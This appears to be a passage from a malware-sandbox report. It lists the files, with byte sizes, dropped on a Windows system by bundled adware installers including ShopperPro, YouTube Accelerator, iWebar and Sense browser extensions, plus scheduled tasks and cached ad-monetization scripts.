      %Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\ns8.tmp (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\AccDownload.dll (10136 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
      %Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
      %WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\System.dll (11 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\WrapperUtils.dll (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\StdUtils.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\Udugcvjfj.exe (1067944 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp\Muhrjqvszul.tmp (270219 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn25.tmp (288289 bytes)
      %WinDir%\Temp\SBC35.tmp (98 bytes)
      %WinDir%\Temp\SBC37.tmp (98 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\engine_2516_YouTubeAcceleratorService.log (159437 bytes)
      %WinDir%\Temp\SBC5B.tmp (547 bytes)
      %WinDir%\Temp\SBC38.tmp (44 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\va_conf.dat (706 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\config.xml (3153 bytes)
      %WinDir%\Temp\SBC39.tmp (51193 bytes)
      %WinDir%\Temp\SBC56.tmp (547 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\YouTubeAcceleratorService_2516.log (591 bytes)
      %WinDir%\Temp\SBC36.tmp (44 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAFIL.LNG (351 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\Res.dll (7575 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\Cancel.gif (610 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\YouTubeAcceleratorService.exe (20644 bytes)
      %Program Files%\YouTube Accelerator\~GLH0008.TMP (2784 bytes)
      %Program Files%\YouTube Accelerator\~GLH0013.TMP (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\GLM1C.tmp (12 bytes)
      %Documents and Settings%\All Users\Start Menu\Programs\YouTube Accelerator\~GLH0020.TMP (65 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\OK.gif (329 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\ytalsp.dll (4623 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\GLC13.tmp (3624 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VANLD.LNG (13 bytes)
      %Program Files%\YouTube Accelerator\~GLH0009.TMP (2712 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAROM.LNG (19 bytes)
      %Program Files%\YouTube Accelerator\temp.000 (51331 bytes)
      %Documents and Settings%\All Users\Start Menu\Programs\YouTube Accelerator\YouTube Accelerator.lnk (833 bytes)
      %Documents and Settings%\%current user%\Desktop\YouTube Accelerator.lnk (821 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAPTB.LNG (401 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAFRA.LNG (402 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\AniGIF.ocx (4087 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\GLK1A.tmp (1568 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\YouTubeAccelerator.exe (35420 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VASRB.LNG (1184 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\ipc.dll (4900 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\updater.exe (12216 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\progbar.gif (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\YTAuninstall.mht (761 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\sporder.Dll (420 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VASRB.LNG (1184 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\~GLH0006.TMP (76524 bytes)
      %Program Files%\YouTube Accelerator\~GLH001a.TMP (12626 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\~GLH0000.TMP (10 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VATRK.LNG (18 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\~GLH0001.TMP (2104 bytes)
      %Program Files%\YouTube Accelerator\~GLH0010.TMP (329 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\unelevate.exe (2050 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAIDN.LNG (17 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\comtest.gif (210 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\GLJ15.tmp (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAPTB.LNG (401 bytes)
      %Program Files%\YouTube Accelerator\~GLH000b.TMP (18940 bytes)
      %Program Files%\YouTube Accelerator\~GLH000e.TMP (7581 bytes)
      %Program Files%\YouTube Accelerator\~GLH0012.TMP (34 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\varemove_page1.mht (10 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\~GLH0003.TMP (119 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\testlsp.exe (20210 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VADEU.LNG (18 bytes)
      %Program Files%\YouTube Accelerator\~GLH0016.TMP (4061 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAPOL.LNG (1166 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAFRA.LNG (402 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAITA.LNG (1660 bytes)
      %Program Files%\YouTube Accelerator\INSTALL.LOG (11 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAFAR.LNG (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\xmldb.dll (4592 bytes)
      %Program Files%\YouTube Accelerator\~GLH000c.TMP (11493 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAENG.LNG (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\lspinst2.exe (28114 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\engine.dll (34715 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAFAR.LNG (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAESM.LNG (873 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VATRK.LNG (18 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAITA.LNG (1660 bytes)
      %Program Files%\YouTube Accelerator\~GLH0019.TMP (11019 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\VAUninstall.exe (3418 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAROM.LNG (19 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\GLG1E.tmp (96056 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VANLD.LNG (13 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAPOL.LNG (1166 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAJPN.LNG (12 bytes)
      %Program Files%\YouTube Accelerator\~GLH0011.TMP (610 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAJPN.LNG (12 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAENG.LNG (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAIDN.LNG (17 bytes)
      %Program Files%\YouTube Accelerator\res\~GLH0015.TMP (75 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\~GLH0004.TMP (24 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VADEU.LNG (18 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAESM.LNG (873 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\~GLH0007.TMP (1568 bytes)
      %Program Files%\YouTube Accelerator\~GLH000f.TMP (11493 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\~GLH0002.TMP (2712 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\varemove_page2.mht (9 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\helper.dll (4699 bytes)
      %Program Files%\YouTube Accelerator\~GLH000d.TMP (941 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAFIL.LNG (351 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\blank.html (75 bytes)
      %Program Files%\YouTube Accelerator\~GLH000a.TMP (3624 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\~GLH001f.TMP (1568 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\~GLH0005.TMP (65 bytes)
      %System%\temp.000 (3624 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\SAINST\lspinst.exe (22571 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\engine_2720_testlsp.log_tmp (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk49.tmp (242 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\test.mht (22 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk41.tmp (1 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\premium_now_accelerating.mht (30 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk55.tmp (1 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\olddriver.mht (22 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk3B.tmp (242 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\testlsp_2720.log_tmp (809 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\YouTubeAccelerator_3416.log_tmp (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\SMALLTEST[1].htm (70 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\activation_expired.mht (22 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\helper_2720_testlsp.log_tmp (144 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk43.tmp (1 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trial_video_accelerator.mht (38 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk53.tmp (1 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\restart.mht (22 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\exiting.mht (22 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\hd_disabled.mht (22 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\ipc_2720_testlsp.log_tmp (1 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\itunesmessage.mht (22 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk45.tmp (1 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\noupdates.mht (30 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\blank.html (97 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\acceleration_not_supported.mht (22 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk4F.tmp (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk4D.tmp (50 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk4B.tmp (682 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\YouTubeAcceleratorService_2516.log_tmp (493 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\dl_update.mht (30 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk3D.tmp (682 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\silenttestfailed.mht (22 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\va_off.mht (22 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk47.tmp (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk51.tmp (1 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trial_now_accelerating.mht (30 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\engine_2516_YouTubeAcceleratorService.log_tmp (29 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk3F.tmp (50 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trialexp_video_accelerator.mht (38 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\premium_video_accelerator.mht (38 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\LspCommTest.zip (191898 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\video_accelerator.mht (38 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\tweetmessage.mht (22 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\now_accelerating.mht (30 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\silenttestsucceeded.mht (22 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\oem_video_accelerator.mht (38 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\va_on.mht (22 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\update.mht (31 bytes)
      %Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\activation_offline.mht (22 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\adextent_m[1].js (431 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\monetizationLoader[1].js (72929 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\price_gong_m[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[1].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie[1].js (491 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dealply_m[1].js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app_code[1].js (2977 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\superfish_no_coupons_m[1].js (759 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\plugins[1].json (4153 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].js (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\similar_products_m[1].js (48329 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\ieC8AB.tmp (260602 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\md5dll.dll (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\40.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\64.js (2 bytes)
      %Program Files%\iWebar\utils.exe (33376 bytes)
      %Program Files%\iWebar\iWebar-buttonutil.dll (2321 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\36.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\38.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\userCode\background.js (429 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (294893 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\13.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\21.js (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\14.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\GoogleUpdateOnDemand.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\184.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\7.js (685 bytes)
      %Program Files%\iWebar\34d16228-9e90-4879-9804-8e38b5180d78-4.exe (5873 bytes)
      %WinDir%\Tasks\34d16228-9e90-4879-9804-8e38b5180d78-4.job (72 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\userCode\extension.js (15 bytes)
      %WinDir%\Tasks\34d16228-9e90-4879-9804-8e38b5180d78-1.job (70 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\195.js (378 bytes)
      %Program Files%\iWebar\iWebar-buttonutil.exe (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\inetc.dll (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\GoogleUpdateHelper.msi (32 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\22.js (8 bytes)
      %Program Files%\iWebar\34d16228-9e90-4879-9804-8e38b5180d78-5.exe (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\78.js (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\72.js (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\npGoogleUpdate4.dll (1281 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\223.js (453 bytes)
      %Program Files%\iWebar\iWebar.ico (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\102.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\43.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\InstallerUtils.dll (25824 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\StdUtils.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\35.js (9 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\17.js (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\112967 (209936 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\183.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\37.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\226.js (400 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\manifest.xml (1 bytes)
      %Program Files%\iWebar\background.html (729 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\220.js (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\204.js (685 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\91.js (5520 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\System.dll (11 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].json (39 bytes)
      %WinDir%\Tasks\34d16228-9e90-4879-9804-8e38b5180d78-2.job (70 bytes)
      %Program Files%\iWebar\35510.xpi (3073 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\155.js (449 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\182.js (14 bytes)
      %Program Files%\iWebar\iWebar-codedownloader.exe (3073 bytes)
      %WinDir%\Tasks\34d16228-9e90-4879-9804-8e38b5180d78-5.job (70 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\217.js (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\2.js (63 bytes)
      %WinDir%\Tasks\temp_34d16228-9e90-4879-9804-8e38b5180d78-2.job (138 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\42.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\207.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\39.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\goopdate.dll (5441 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\1.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\GoogleCrashHandler.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\GoogleUpdateBroker.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\41.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\psuser.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\45.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\UserInfo.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins.json (13 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\ExecDos.dll (5 bytes)
      %Program Files%\iWebar\Uninstall.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\9.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\28.js (536 bytes)
      %Program Files%\iWebar\iWebar-bg.exe (4185 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\nsisos.dll (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\104.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\114943 (781608 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\goopdateres_en.dll (26 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\47.js (7 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\244.js (501 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\4.js (3312 bytes)
      %Program Files%\iWebar\34d16228-9e90-4879-9804-8e38b5180d78-2.exe (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\246.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\46.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\94.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\psmachine.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\44.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\177.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\3.js (63 bytes)
      %Program Files%\iWebar\iWebar-bho.dll (3361 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\InstallerUtils2.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\93.js (793 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\update.json (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\intext_5_j_m[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\plugins[2].json (4585 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup[1].js (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\monetizationLoader[2].js (72929 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\manifest[1].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\superfish_no_coupons_m[1].js (759 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\dealply_m[1].js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ciuvo_m[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app_code[1].js (616 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\System.dll (11 bytes)
      %Program Files%\Sense\48292.xpi (3073 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\47.js (7 bytes)
      %Program Files%\Sense\48292.crx (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\InstallerUtils.dll (25824 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\7.js (685 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\14.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\userCode\background.js (429 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\39.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\123.js (889 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\plugins\182.js (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsn29.tmp\extensionData\manifest.xml (1 bytes)
